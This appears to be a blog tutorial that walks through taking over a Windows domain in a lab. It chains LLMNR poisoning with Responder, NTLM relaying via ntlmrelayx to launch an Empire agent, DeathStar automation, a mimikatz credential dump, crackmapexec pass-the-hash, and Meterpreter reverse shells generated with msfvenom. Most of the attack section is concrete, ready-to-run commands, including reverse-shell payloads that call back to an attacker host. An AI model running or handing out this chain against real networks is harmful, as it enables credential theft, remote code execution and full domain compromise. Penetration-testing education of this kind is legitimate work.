Automating the Pentesting Process: Using NTLM Relaying & Deathstar to get Domain Admin

Ntlmrelayx.py (Install Guide here)

Operating Systems

Host: Ubuntu 16.04, Kali Linux (Latest)

Target 1: Windows Server 2008 R2 (Dummy server)

Target 2: Windows Server 2008 R2 (Domain Controller)

In a domain, it’s not uncommon for NTLMv2 hashes to be captured in some way while doing a penetration test. The problem is that NTLMv2 hashes cannot be passed (but regular NTLM can) and if your dictionary isn’t good or they enforce a strict password with numbers and special characters, you’ll be sitting with an NTLMv2 Hash and username and nothing to do. However, there is the option of relaying that username & hash. The nasty thing about this is NTLM Relaying can lead to remote code execution if the captured credentials have access to shares on a Windows server. What gets even worse is there’s a few tools that can automate the entire damn thing.

Now before I get started there’s a few things I’d like to clarify.

  1. I have to use Ubuntu for Deathstar because Deathstar will not work with the current version of Kali due to the python requests not wanting to negotiate any version of TLS less than 1.2.
  2. This first part of this process is assuming that NTLM relaying is possible, which if SMB signing is enabled, this entire operation is dead in the water. By default, it’s disabled, so that’s good/bad depending on your perspective. Deathstar needs an Empire agent to work, so if you can get that agent on a machine by any ways possible, Deathstar will do its stuff. It doesn’t NEED NTLM relaying, this is just an interesting way of getting an Empire agent.
  3. I’m doing this on my lab network, not someone else’s. This demo is simulating what can happen if LLMNR spoofing is possible and a domain admin credentials are captured. This is a very limited demo of what Deathstar & Crackmapexec can do and I encourage you to read about it’s capabilities here.

Without further ado:

I first start up the RESTful API for Empire in one terminal.

sudo python empire --rest --username empireadmin --password Password123

Then I start up Deathstar in another.

sudo ./DeathStar.py --listener-ip 192.168.232.133 -t 100

Listener IP will be whatever IP Empire is listening on. -t 100 means I’m giving it 100 threads to run, so it’s faster.

Next, I generate the powershell script from Empire. To do this, go to the listener module in Empire by typing in

Listeners

From here, I create the payload by using the command

launcher powershell Deathstar

Copy the powershell script as you’ll paste it in a minute.

Next, I set up ntlmrelayx.py (Guide to set up NTLMRelayx.py here)

sudo ntlmrelayx.py -t 192.168.232.100 -c 'powershell -noP -sta -w 1 -enc  [powershell code]'

ntlmrelayx.py also supports files with the -tf switch, so you can put in multiple targets if you wanted. Keep note that the powershell script must be in quotes or else it won’t run.

Next, edit the Responder.conf file in the Responder repository and turn off SMB and HTTP

Finally, start up Responder

sudo python Responder.py -I ens33 -r -d -v

My screen then looks like this once it’s all set up.

Next, using my Windows machine, I simulate the domain admin mistyping a share, generating a LLMNR request.

Poisoned answer is then sent via Responder

NTLMv2 hashed credentials are relayed

Empire agent opened

Deathstar automatically starts doing its thing

Deathstar, for this demo, took about 5 minutes to find the domain controller, its active users, then spawn another Empire agent on the domain controller.

An Empire agent is now running on the DC

The final step is to get a shell.

There’s many ways to do this

  1. Upload a meterpreter payload in the form of a .exe and execute it via the shell command
  2. Use mimikatz to get the credentials on the server and use crackmapexec to pass the hash and open a meterpreter session
  3. Use Empire’s Invoke-Shellcode module
  4. Many more, research it.

Using Mimikatz & Crackmapexec to open Meterpreter Shell

First is to interact with the agent. Always use the agent with SYSTEM privileges. While user “god” is domain admin, SYSTEM is still a higher privilege.

interact [agent name]

Then run mimikatz

mimikatz

After a minute it’ll spit out a ton of info. Ignore it by pressing enter and then typing

creds

and a nice table is shown.

As you can see, it found the hashes and plain text password of the domain administrator. From here, we can use crackmapexec to open a reverse shell.

First set up multi/handler

Then run crackmapexec. Even though I have the password in plain text, I’m demonstrating the hash here to show PTH is possible.

crackmapexec 192.168.232.100 -u god -H 7314885dc066c5fd98e6ae96832fa905 -M metinject -o LHOST=192.168.232.136 LPORT=4443

Uploading a Meterpreter Payload via Empire

First, create a Meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.136 LPORT=4443 -f exe > shell.exe

Copy the .exe into the Empire directory

Interact with the agent in Empire

interact [Agent name]

Upload and execute the .exe

Grats on shell

There’s many many more ways to escalate from an agent to a shell, but these are two of the easiest, albeit uploading an executable is not the stealthiest and probably the least recommended, but a shell is a shell.

Extra Resources and credit for Deathstar & Crackmapexec:

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

Browse

Article by channel:

Read more articles tagged: Automation